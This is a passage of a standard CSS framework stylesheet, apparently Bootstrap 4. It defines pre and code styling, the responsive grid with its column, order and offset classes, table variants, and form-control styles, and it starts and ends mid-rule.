
kbd kbd {
  padding: 0;
  font-size: 100%;
  font-weight: 700;
}

pre {
  display: block;
  font-size: 87.5%;
  color: #212529;
}

pre code {
  font-size: inherit;
  color: inherit;
  word-break: normal;
}

.pre-scrollable {
  max-height: 340px;
  overflow-y: scroll;
}

.container {
  width: 100%;
  padding-right: 15px;
  padding-left: 15px;
  margin-right: auto;
  margin-left: auto;
}

@media (min-width: 576px) {
  .container {
    max-width: 540px;
  }
}

@media (min-width: 768px) {
  .container {
    max-width: 720px;
  }
}

@media (min-width: 992px) {
  .container {
    max-width: 960px;
  }
}

@media (min-width: 1200px) {
  .container {
    max-width: 1140px;
  }
}

.container-fluid {
  width: 100%;
  padding-right: 15px;
  padding-left: 15px;
  margin-right: auto;
  margin-left: auto;
}

.row {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
  margin-right: -15px;
  margin-left: -15px;
}

.no-gutters {
  margin-right: 0;
  margin-left: 0;
}

.no-gutters > .col,
.no-gutters > [class*="col-"] {
  padding-right: 0;
  padding-left: 0;
}

.col-1, .col-2, .col-3, .col-4, .col-5, .col-6, .col-7, .col-8, .col-9, .col-10, .col-11, .col-12, .col,
.col-auto, .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm,
.col-sm-auto, .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12, .col-md,
.col-md-auto, .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg,
.col-lg-auto, .col-xl-1, .col-xl-2, .col-xl-3, .col-xl-4, .col-xl-5, .col-xl-6, .col-xl-7, .col-xl-8, .col-xl-9, .col-xl-10, .col-xl-11, .col-xl-12, .col-xl,
.col-xl-auto {
  position: relative;
  width: 100%;
  min-height: 1px;
  padding-right: 15px;
  padding-left: 15px;
}

.col {
  -ms-flex-preferred-size: 0;
  flex-basis: 0;
  -webkit-box-flex: 1;
  -ms-flex-positive: 1;
  flex-grow: 1;
  max-width: 100%;
}

.col-auto {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 auto;
  flex: 0 0 auto;
  width: auto;
  max-width: none;
}

.col-1 {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 8.333333%;
  flex: 0 0 8.333333%;
  max-width: 8.333333%;
}

.col-2 {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 16.666667%;
  flex: 0 0 16.666667%;
  max-width: 16.666667%;
}

.col-3 {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 25%;
  flex: 0 0 25%;
  max-width: 25%;
}

.col-4 {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 33.333333%;
  flex: 0 0 33.333333%;
  max-width: 33.333333%;
}

.col-5 {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 41.666667%;
  flex: 0 0 41.666667%;
  max-width: 41.666667%;
}

.col-6 {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 50%;
  flex: 0 0 50%;
  max-width: 50%;
}

.col-7 {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 58.333333%;
  flex: 0 0 58.333333%;
  max-width: 58.333333%;
}

.col-8 {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 66.666667%;
  flex: 0 0 66.666667%;
  max-width: 66.666667%;
}

.col-9 {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 75%;
  flex: 0 0 75%;
  max-width: 75%;
}

.col-10 {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 83.333333%;
  flex: 0 0 83.333333%;
  max-width: 83.333333%;
}

.col-11 {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 91.666667%;
  flex: 0 0 91.666667%;
  max-width: 91.666667%;
}

.col-12 {
  -webkit-box-flex: 0;
  -ms-flex: 0 0 100%;
  flex: 0 0 100%;
  max-width: 100%;
}

.order-first {
  -webkit-box-ordinal-group: 0;
  -ms-flex-order: -1;
  order: -1;
}

.order-last {
  -webkit-box-ordinal-group: 14;
  -ms-flex-order: 13;
  order: 13;
}

.order-0 {
  -webkit-box-ordinal-group: 1;
  -ms-flex-order: 0;
  order: 0;
}

.order-1 {
  -webkit-box-ordinal-group: 2;
  -ms-flex-order: 1;
  order: 1;
}

.order-2 {
  -webkit-box-ordinal-group: 3;
  -ms-flex-order: 2;
  order: 2;
}

.order-3 {
  -webkit-box-ordinal-group: 4;
  -ms-flex-order: 3;
  order: 3;
}

.order-4 {
  -webkit-box-ordinal-group: 5;
  -ms-flex-order: 4;
  order: 4;
}

.order-5 {
  -webkit-box-ordinal-group: 6;
  -ms-flex-order: 5;
  order: 5;
}

.order-6 {
  -webkit-box-ordinal-group: 7;
  -ms-flex-order: 6;
  order: 6;
}

.order-7 {
  -webkit-box-ordinal-group: 8;
  -ms-flex-order: 7;
  order: 7;
}

.order-8 {
  -webkit-box-ordinal-group: 9;
  -ms-flex-order: 8;
  order: 8;
}

.order-9 {
  -webkit-box-ordinal-group: 10;
  -ms-flex-order: 9;
  order: 9;
}

.order-10 {
  -webkit-box-ordinal-group: 11;
  -ms-flex-order: 10;
  order: 10;
}

.order-11 {
  -webkit-box-ordinal-group: 12;
  -ms-flex-order: 11;
  order: 11;
}

.order-12 {
  -webkit-box-ordinal-group: 13;
  -ms-flex-order: 12;
  order: 12;
}

.offset-1 {
  margin-left: 8.333333%;
}

.offset-2 {
  margin-left: 16.666667%;
}

.offset-3 {
  margin-left: 25%;
}

.offset-4 {
  margin-left: 33.333333%;
}

.offset-5 {
  margin-left: 41.666667%;
}

.offset-6 {
  margin-left: 50%;
}

.offset-7 {
  margin-left: 58.333333%;
}

.offset-8 {
  margin-left: 66.666667%;
}

.offset-9 {
  margin-left: 75%;
}

.offset-10 {
  margin-left: 83.333333%;
}

.offset-11 {
  margin-left: 91.666667%;
}

@media (min-width: 576px) {
  .col-sm {
    -ms-flex-preferred-size: 0;
    flex-basis: 0;
    -webkit-box-flex: 1;
    -ms-flex-positive: 1;
    flex-grow: 1;
    max-width: 100%;
  }
  .col-sm-auto {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 auto;
    flex: 0 0 auto;
    width: auto;
    max-width: none;
  }
  .col-sm-1 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 8.333333%;
    flex: 0 0 8.333333%;
    max-width: 8.333333%;
  }
  .col-sm-2 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 16.666667%;
    flex: 0 0 16.666667%;
    max-width: 16.666667%;
  }
  .col-sm-3 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 25%;
    flex: 0 0 25%;
    max-width: 25%;
  }
  .col-sm-4 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 33.333333%;
    flex: 0 0 33.333333%;
    max-width: 33.333333%;
  }
  .col-sm-5 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 41.666667%;
    flex: 0 0 41.666667%;
    max-width: 41.666667%;
  }
  .col-sm-6 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 50%;
    flex: 0 0 50%;
    max-width: 50%;
  }
  .col-sm-7 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 58.333333%;
    flex: 0 0 58.333333%;
    max-width: 58.333333%;
  }
  .col-sm-8 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 66.666667%;
    flex: 0 0 66.666667%;
    max-width: 66.666667%;
  }
  .col-sm-9 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 75%;
    flex: 0 0 75%;
    max-width: 75%;
  }
  .col-sm-10 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 83.333333%;
    flex: 0 0 83.333333%;
    max-width: 83.333333%;
  }
  .col-sm-11 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 91.666667%;
    flex: 0 0 91.666667%;
    max-width: 91.666667%;
  }
  .col-sm-12 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 100%;
    flex: 0 0 100%;
    max-width: 100%;
  }
  .order-sm-first {
    -webkit-box-ordinal-group: 0;
    -ms-flex-order: -1;
    order: -1;
  }
  .order-sm-last {
    -webkit-box-ordinal-group: 14;
    -ms-flex-order: 13;
    order: 13;
  }
  .order-sm-0 {
    -webkit-box-ordinal-group: 1;
    -ms-flex-order: 0;
    order: 0;
  }
  .order-sm-1 {
    -webkit-box-ordinal-group: 2;
    -ms-flex-order: 1;
    order: 1;
  }
  .order-sm-2 {
    -webkit-box-ordinal-group: 3;
    -ms-flex-order: 2;
    order: 2;
  }
  .order-sm-3 {
    -webkit-box-ordinal-group: 4;
    -ms-flex-order: 3;
    order: 3;
  }
  .order-sm-4 {
    -webkit-box-ordinal-group: 5;
    -ms-flex-order: 4;
    order: 4;
  }
  .order-sm-5 {
    -webkit-box-ordinal-group: 6;
    -ms-flex-order: 5;
    order: 5;
  }
  .order-sm-6 {
    -webkit-box-ordinal-group: 7;
    -ms-flex-order: 6;
    order: 6;
  }
  .order-sm-7 {
    -webkit-box-ordinal-group: 8;
    -ms-flex-order: 7;
    order: 7;
  }
  .order-sm-8 {
    -webkit-box-ordinal-group: 9;
    -ms-flex-order: 8;
    order: 8;
  }
  .order-sm-9 {
    -webkit-box-ordinal-group: 10;
    -ms-flex-order: 9;
    order: 9;
  }
  .order-sm-10 {
    -webkit-box-ordinal-group: 11;
    -ms-flex-order: 10;
    order: 10;
  }
  .order-sm-11 {
    -webkit-box-ordinal-group: 12;
    -ms-flex-order: 11;
    order: 11;
  }
  .order-sm-12 {
    -webkit-box-ordinal-group: 13;
    -ms-flex-order: 12;
    order: 12;
  }
  .offset-sm-0 {
    margin-left: 0;
  }
  .offset-sm-1 {
    margin-left: 8.333333%;
  }
  .offset-sm-2 {
    margin-left: 16.666667%;
  }
  .offset-sm-3 {
    margin-left: 25%;
  }
  .offset-sm-4 {
    margin-left: 33.333333%;
  }
  .offset-sm-5 {
    margin-left: 41.666667%;
  }
  .offset-sm-6 {
    margin-left: 50%;
  }
  .offset-sm-7 {
    margin-left: 58.333333%;
  }
  .offset-sm-8 {
    margin-left: 66.666667%;
  }
  .offset-sm-9 {
    margin-left: 75%;
  }
  .offset-sm-10 {
    margin-left: 83.333333%;
  }
  .offset-sm-11 {
    margin-left: 91.666667%;
  }
}

@media (min-width: 768px) {
  .col-md {
    -ms-flex-preferred-size: 0;
    flex-basis: 0;
    -webkit-box-flex: 1;
    -ms-flex-positive: 1;
    flex-grow: 1;
    max-width: 100%;
  }
  .col-md-auto {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 auto;
    flex: 0 0 auto;
    width: auto;
    max-width: none;
  }
  .col-md-1 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 8.333333%;
    flex: 0 0 8.333333%;
    max-width: 8.333333%;
  }
  .col-md-2 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 16.666667%;
    flex: 0 0 16.666667%;
    max-width: 16.666667%;
  }
  .col-md-3 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 25%;
    flex: 0 0 25%;
    max-width: 25%;
  }
  .col-md-4 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 33.333333%;
    flex: 0 0 33.333333%;
    max-width: 33.333333%;
  }
  .col-md-5 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 41.666667%;
    flex: 0 0 41.666667%;
    max-width: 41.666667%;
  }
  .col-md-6 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 50%;
    flex: 0 0 50%;
    max-width: 50%;
  }
  .col-md-7 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 58.333333%;
    flex: 0 0 58.333333%;
    max-width: 58.333333%;
  }
  .col-md-8 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 66.666667%;
    flex: 0 0 66.666667%;
    max-width: 66.666667%;
  }
  .col-md-9 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 75%;
    flex: 0 0 75%;
    max-width: 75%;
  }
  .col-md-10 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 83.333333%;
    flex: 0 0 83.333333%;
    max-width: 83.333333%;
  }
  .col-md-11 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 91.666667%;
    flex: 0 0 91.666667%;
    max-width: 91.666667%;
  }
  .col-md-12 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 100%;
    flex: 0 0 100%;
    max-width: 100%;
  }
  .order-md-first {
    -webkit-box-ordinal-group: 0;
    -ms-flex-order: -1;
    order: -1;
  }
  .order-md-last {
    -webkit-box-ordinal-group: 14;
    -ms-flex-order: 13;
    order: 13;
  }
  .order-md-0 {
    -webkit-box-ordinal-group: 1;
    -ms-flex-order: 0;
    order: 0;
  }
  .order-md-1 {
    -webkit-box-ordinal-group: 2;
    -ms-flex-order: 1;
    order: 1;
  }
  .order-md-2 {
    -webkit-box-ordinal-group: 3;
    -ms-flex-order: 2;
    order: 2;
  }
  .order-md-3 {
    -webkit-box-ordinal-group: 4;
    -ms-flex-order: 3;
    order: 3;
  }
  .order-md-4 {
    -webkit-box-ordinal-group: 5;
    -ms-flex-order: 4;
    order: 4;
  }
  .order-md-5 {
    -webkit-box-ordinal-group: 6;
    -ms-flex-order: 5;
    order: 5;
  }
  .order-md-6 {
    -webkit-box-ordinal-group: 7;
    -ms-flex-order: 6;
    order: 6;
  }
  .order-md-7 {
    -webkit-box-ordinal-group: 8;
    -ms-flex-order: 7;
    order: 7;
  }
  .order-md-8 {
    -webkit-box-ordinal-group: 9;
    -ms-flex-order: 8;
    order: 8;
  }
  .order-md-9 {
    -webkit-box-ordinal-group: 10;
    -ms-flex-order: 9;
    order: 9;
  }
  .order-md-10 {
    -webkit-box-ordinal-group: 11;
    -ms-flex-order: 10;
    order: 10;
  }
  .order-md-11 {
    -webkit-box-ordinal-group: 12;
    -ms-flex-order: 11;
    order: 11;
  }
  .order-md-12 {
    -webkit-box-ordinal-group: 13;
    -ms-flex-order: 12;
    order: 12;
  }
  .offset-md-0 {
    margin-left: 0;
  }
  .offset-md-1 {
    margin-left: 8.333333%;
  }
  .offset-md-2 {
    margin-left: 16.666667%;
  }
  .offset-md-3 {
    margin-left: 25%;
  }
  .offset-md-4 {
    margin-left: 33.333333%;
  }
  .offset-md-5 {
    margin-left: 41.666667%;
  }
  .offset-md-6 {
    margin-left: 50%;
  }
  .offset-md-7 {
    margin-left: 58.333333%;
  }
  .offset-md-8 {
    margin-left: 66.666667%;
  }
  .offset-md-9 {
    margin-left: 75%;
  }
  .offset-md-10 {
    margin-left: 83.333333%;
  }
  .offset-md-11 {
    margin-left: 91.666667%;
  }
}

@media (min-width: 992px) {
  .col-lg {
    -ms-flex-preferred-size: 0;
    flex-basis: 0;
    -webkit-box-flex: 1;
    -ms-flex-positive: 1;
    flex-grow: 1;
    max-width: 100%;
  }
  .col-lg-auto {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 auto;
    flex: 0 0 auto;
    width: auto;
    max-width: none;
  }
  .col-lg-1 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 8.333333%;
    flex: 0 0 8.333333%;
    max-width: 8.333333%;
  }
  .col-lg-2 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 16.666667%;
    flex: 0 0 16.666667%;
    max-width: 16.666667%;
  }
  .col-lg-3 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 25%;
    flex: 0 0 25%;
    max-width: 25%;
  }
  .col-lg-4 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 33.333333%;
    flex: 0 0 33.333333%;
    max-width: 33.333333%;
  }
  .col-lg-5 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 41.666667%;
    flex: 0 0 41.666667%;
    max-width: 41.666667%;
  }
  .col-lg-6 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 50%;
    flex: 0 0 50%;
    max-width: 50%;
  }
  .col-lg-7 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 58.333333%;
    flex: 0 0 58.333333%;
    max-width: 58.333333%;
  }
  .col-lg-8 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 66.666667%;
    flex: 0 0 66.666667%;
    max-width: 66.666667%;
  }
  .col-lg-9 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 75%;
    flex: 0 0 75%;
    max-width: 75%;
  }
  .col-lg-10 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 83.333333%;
    flex: 0 0 83.333333%;
    max-width: 83.333333%;
  }
  .col-lg-11 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 91.666667%;
    flex: 0 0 91.666667%;
    max-width: 91.666667%;
  }
  .col-lg-12 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 100%;
    flex: 0 0 100%;
    max-width: 100%;
  }
  .order-lg-first {
    -webkit-box-ordinal-group: 0;
    -ms-flex-order: -1;
    order: -1;
  }
  .order-lg-last {
    -webkit-box-ordinal-group: 14;
    -ms-flex-order: 13;
    order: 13;
  }
  .order-lg-0 {
    -webkit-box-ordinal-group: 1;
    -ms-flex-order: 0;
    order: 0;
  }
  .order-lg-1 {
    -webkit-box-ordinal-group: 2;
    -ms-flex-order: 1;
    order: 1;
  }
  .order-lg-2 {
    -webkit-box-ordinal-group: 3;
    -ms-flex-order: 2;
    order: 2;
  }
  .order-lg-3 {
    -webkit-box-ordinal-group: 4;
    -ms-flex-order: 3;
    order: 3;
  }
  .order-lg-4 {
    -webkit-box-ordinal-group: 5;
    -ms-flex-order: 4;
    order: 4;
  }
  .order-lg-5 {
    -webkit-box-ordinal-group: 6;
    -ms-flex-order: 5;
    order: 5;
  }
  .order-lg-6 {
    -webkit-box-ordinal-group: 7;
    -ms-flex-order: 6;
    order: 6;
  }
  .order-lg-7 {
    -webkit-box-ordinal-group: 8;
    -ms-flex-order: 7;
    order: 7;
  }
  .order-lg-8 {
    -webkit-box-ordinal-group: 9;
    -ms-flex-order: 8;
    order: 8;
  }
  .order-lg-9 {
    -webkit-box-ordinal-group: 10;
    -ms-flex-order: 9;
    order: 9;
  }
  .order-lg-10 {
    -webkit-box-ordinal-group: 11;
    -ms-flex-order: 10;
    order: 10;
  }
  .order-lg-11 {
    -webkit-box-ordinal-group: 12;
    -ms-flex-order: 11;
    order: 11;
  }
  .order-lg-12 {
    -webkit-box-ordinal-group: 13;
    -ms-flex-order: 12;
    order: 12;
  }
  .offset-lg-0 {
    margin-left: 0;
  }
  .offset-lg-1 {
    margin-left: 8.333333%;
  }
  .offset-lg-2 {
    margin-left: 16.666667%;
  }
  .offset-lg-3 {
    margin-left: 25%;
  }
  .offset-lg-4 {
    margin-left: 33.333333%;
  }
  .offset-lg-5 {
    margin-left: 41.666667%;
  }
  .offset-lg-6 {
    margin-left: 50%;
  }
  .offset-lg-7 {
    margin-left: 58.333333%;
  }
  .offset-lg-8 {
    margin-left: 66.666667%;
  }
  .offset-lg-9 {
    margin-left: 75%;
  }
  .offset-lg-10 {
    margin-left: 83.333333%;
  }
  .offset-lg-11 {
    margin-left: 91.666667%;
  }
}

@media (min-width: 1200px) {
  .col-xl {
    -ms-flex-preferred-size: 0;
    flex-basis: 0;
    -webkit-box-flex: 1;
    -ms-flex-positive: 1;
    flex-grow: 1;
    max-width: 100%;
  }
  .col-xl-auto {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 auto;
    flex: 0 0 auto;
    width: auto;
    max-width: none;
  }
  .col-xl-1 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 8.333333%;
    flex: 0 0 8.333333%;
    max-width: 8.333333%;
  }
  .col-xl-2 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 16.666667%;
    flex: 0 0 16.666667%;
    max-width: 16.666667%;
  }
  .col-xl-3 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 25%;
    flex: 0 0 25%;
    max-width: 25%;
  }
  .col-xl-4 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 33.333333%;
    flex: 0 0 33.333333%;
    max-width: 33.333333%;
  }
  .col-xl-5 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 41.666667%;
    flex: 0 0 41.666667%;
    max-width: 41.666667%;
  }
  .col-xl-6 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 50%;
    flex: 0 0 50%;
    max-width: 50%;
  }
  .col-xl-7 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 58.333333%;
    flex: 0 0 58.333333%;
    max-width: 58.333333%;
  }
  .col-xl-8 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 66.666667%;
    flex: 0 0 66.666667%;
    max-width: 66.666667%;
  }
  .col-xl-9 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 75%;
    flex: 0 0 75%;
    max-width: 75%;
  }
  .col-xl-10 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 83.333333%;
    flex: 0 0 83.333333%;
    max-width: 83.333333%;
  }
  .col-xl-11 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 91.666667%;
    flex: 0 0 91.666667%;
    max-width: 91.666667%;
  }
  .col-xl-12 {
    -webkit-box-flex: 0;
    -ms-flex: 0 0 100%;
    flex: 0 0 100%;
    max-width: 100%;
  }
  .order-xl-first {
    -webkit-box-ordinal-group: 0;
    -ms-flex-order: -1;
    order: -1;
  }
  .order-xl-last {
    -webkit-box-ordinal-group: 14;
    -ms-flex-order: 13;
    order: 13;
  }
  .order-xl-0 {
    -webkit-box-ordinal-group: 1;
    -ms-flex-order: 0;
    order: 0;
  }
  .order-xl-1 {
    -webkit-box-ordinal-group: 2;
    -ms-flex-order: 1;
    order: 1;
  }
  .order-xl-2 {
    -webkit-box-ordinal-group: 3;
    -ms-flex-order: 2;
    order: 2;
  }
  .order-xl-3 {
    -webkit-box-ordinal-group: 4;
    -ms-flex-order: 3;
    order: 3;
  }
  .order-xl-4 {
    -webkit-box-ordinal-group: 5;
    -ms-flex-order: 4;
    order: 4;
  }
  .order-xl-5 {
    -webkit-box-ordinal-group: 6;
    -ms-flex-order: 5;
    order: 5;
  }
  .order-xl-6 {
    -webkit-box-ordinal-group: 7;
    -ms-flex-order: 6;
    order: 6;
  }
  .order-xl-7 {
    -webkit-box-ordinal-group: 8;
    -ms-flex-order: 7;
    order: 7;
  }
  .order-xl-8 {
    -webkit-box-ordinal-group: 9;
    -ms-flex-order: 8;
    order: 8;
  }
  .order-xl-9 {
    -webkit-box-ordinal-group: 10;
    -ms-flex-order: 9;
    order: 9;
  }
  .order-xl-10 {
    -webkit-box-ordinal-group: 11;
    -ms-flex-order: 10;
    order: 10;
  }
  .order-xl-11 {
    -webkit-box-ordinal-group: 12;
    -ms-flex-order: 11;
    order: 11;
  }
  .order-xl-12 {
    -webkit-box-ordinal-group: 13;
    -ms-flex-order: 12;
    order: 12;
  }
  .offset-xl-0 {
    margin-left: 0;
  }
  .offset-xl-1 {
    margin-left: 8.333333%;
  }
  .offset-xl-2 {
    margin-left: 16.666667%;
  }
  .offset-xl-3 {
    margin-left: 25%;
  }
  .offset-xl-4 {
    margin-left: 33.333333%;
  }
  .offset-xl-5 {
    margin-left: 41.666667%;
  }
  .offset-xl-6 {
    margin-left: 50%;
  }
  .offset-xl-7 {
    margin-left: 58.333333%;
  }
  .offset-xl-8 {
    margin-left: 66.666667%;
  }
  .offset-xl-9 {
    margin-left: 75%;
  }
  .offset-xl-10 {
    margin-left: 83.333333%;
  }
  .offset-xl-11 {
    margin-left: 91.666667%;
  }
}

.table {
  width: 100%;
  max-width: 100%;
  margin-bottom: 1rem;
  background-color: transparent;
}

.table th,
.table td {
  padding: 0.75rem;
  vertical-align: top;
  border-top: 1px solid #dee2e6;
}

.table thead th {
  vertical-align: bottom;
  border-bottom: 2px solid #dee2e6;
}

.table tbody + tbody {
  border-top: 2px solid #dee2e6;
}

.table .table {
  background-color: #fff;
}

.table-sm th,
.table-sm td {
  padding: 0.3rem;
}

.table-bordered {
  border: 1px solid #dee2e6;
}

.table-bordered th,
.table-bordered td {
  border: 1px solid #dee2e6;
}

.table-bordered thead th,
.table-bordered thead td {
  border-bottom-width: 2px;
}

.table-striped tbody tr:nth-of-type(odd) {
  background-color: rgba(0, 0, 0, 0.05);
}

.table-hover tbody tr:hover {
  background-color: rgba(0, 0, 0, 0.075);
}

.table-primary,
.table-primary > th,
.table-primary > td {
  background-color: #b8daff;
}

.table-hover .table-primary:hover {
  background-color: #9fcdff;
}

.table-hover .table-primary:hover > td,
.table-hover .table-primary:hover > th {
  background-color: #9fcdff;
}

.table-secondary,
.table-secondary > th,
.table-secondary > td {
  background-color: #d6d8db;
}

.table-hover .table-secondary:hover {
  background-color: #c8cbcf;
}

.table-hover .table-secondary:hover > td,
.table-hover .table-secondary:hover > th {
  background-color: #c8cbcf;
}

.table-success,
.table-success > th,
.table-success > td {
  background-color: #c3e6cb;
}

.table-hover .table-success:hover {
  background-color: #b1dfbb;
}

.table-hover .table-success:hover > td,
.table-hover .table-success:hover > th {
  background-color: #b1dfbb;
}

.table-info,
.table-info > th,
.table-info > td {
  background-color: #bee5eb;
}

.table-hover .table-info:hover {
  background-color: #abdde5;
}

.table-hover .table-info:hover > td,
.table-hover .table-info:hover > th {
  background-color: #abdde5;
}

.table-warning,
.table-warning > th,
.table-warning > td {
  background-color: #ffeeba;
}

.table-hover .table-warning:hover {
  background-color: #ffe8a1;
}

.table-hover .table-warning:hover > td,
.table-hover .table-warning:hover > th {
  background-color: #ffe8a1;
}

.table-danger,
.table-danger > th,
.table-danger > td {
  background-color: #f5c6cb;
}

.table-hover .table-danger:hover {
  background-color: #f1b0b7;
}

.table-hover .table-danger:hover > td,
.table-hover .table-danger:hover > th {
  background-color: #f1b0b7;
}

.table-light,
.table-light > th,
.table-light > td {
  background-color: #fdfdfe;
}

.table-hover .table-light:hover {
  background-color: #ececf6;
}

.table-hover .table-light:hover > td,
.table-hover .table-light:hover > th {
  background-color: #ececf6;
}

.table-dark,
.table-dark > th,
.table-dark > td {
  background-color: #c6c8ca;
}

.table-hover .table-dark:hover {
  background-color: #b9bbbe;
}

.table-hover .table-dark:hover > td,
.table-hover .table-dark:hover > th {
  background-color: #b9bbbe;
}

.table-active,
.table-active > th,
.table-active > td {
  background-color: rgba(0, 0, 0, 0.075);
}

.table-hover .table-active:hover {
  background-color: rgba(0, 0, 0, 0.075);
}

.table-hover .table-active:hover > td,
.table-hover .table-active:hover > th {
  background-color: rgba(0, 0, 0, 0.075);
}

.table .thead-dark th {
  color: #fff;
  background-color: #212529;
  border-color: #32383e;
}

.table .thead-light th {
  color: #495057;
  background-color: #e9ecef;
  border-color: #dee2e6;
}

.table-dark {
  color: #fff;
  background-color: #212529;
}

.table-dark th,
.table-dark td,
.table-dark thead th {
  border-color: #32383e;
}

.table-dark.table-bordered {
  border: 0;
}

.table-dark.table-striped tbody tr:nth-of-type(odd) {
  background-color: rgba(255, 255, 255, 0.05);
}

.table-dark.table-hover tbody tr:hover {
  background-color: rgba(255, 255, 255, 0.075);
}

@media (max-width: 575.98px) {
  .table-responsive-sm {
    display: block;
    width: 100%;
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
    -ms-overflow-style: -ms-autohiding-scrollbar;
  }
  .table-responsive-sm > .table-bordered {
    border: 0;
  }
}

@media (max-width: 767.98px) {
  .table-responsive-md {
    display: block;
    width: 100%;
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
    -ms-overflow-style: -ms-autohiding-scrollbar;
  }
  .table-responsive-md > .table-bordered {
    border: 0;
  }
}

@media (max-width: 991.98px) {
  .table-responsive-lg {
    display: block;
    width: 100%;
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
    -ms-overflow-style: -ms-autohiding-scrollbar;
  }
  .table-responsive-lg > .table-bordered {
    border: 0;
  }
}

@media (max-width: 1199.98px) {
  .table-responsive-xl {
    display: block;
    width: 100%;
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
    -ms-overflow-style: -ms-autohiding-scrollbar;
  }
  .table-responsive-xl > .table-bordered {
    border: 0;
  }
}

.table-responsive {
  display: block;
  width: 100%;
  overflow-x: auto;
  -webkit-overflow-scrolling: touch;
  -ms-overflow-style: -ms-autohiding-scrollbar;
}

.table-responsive > .table-bordered {
  border: 0;
}

.form-control {
  display: block;
  width: 100%;
  padding: 0.375rem 0.75rem;
  font-size: 1rem;
  line-height: 1.5;
  color: #495057;
  background-color: #fff;
  background-clip: padding-box;
  border: 1px solid #ced4da;
  border-radius: 0.25rem;
  transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}

.form-control::-ms-expand {
  background-color: transparent;
  border: 0;
}

.form-control:focus {
  color: #495057;
  background-color: #fff;
  border-color: #80bdff;
  outline: 0;
  box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.25);
}

.form-control::-webkit-input-placeholder {
  color: #6c757d;
  opacity: 1;
}

.form-control::-moz-placeholder {
  color: #6c757d;
  opacity: 1;
}

.form-control:-ms-input-placeholder {
  color: #6c757d;
  opacity: 1;
}

.form-control::-ms-input-placeholder {
  color: #6c757d;
  opacity: 1;
}

.form-control::placeholder {
  color: #6c757d;
  opacity: 1;
}

.form-control:disabled, .form-control[readonly] {
  background-color: #e9ecef;
  opacity: 1;
}

select.form-control:not([size]):not([multiple]) {
  height: calc(2.25rem + 2px);
}

select.form-control:focus::-ms-value {
  color: #495057;
  background-color: #fff;
}

.form-control-file,
.form-control-range {
  display: block;
  width: 100%;
}

.col-form-label {
  padding-top: calc(0.375rem + 1px);
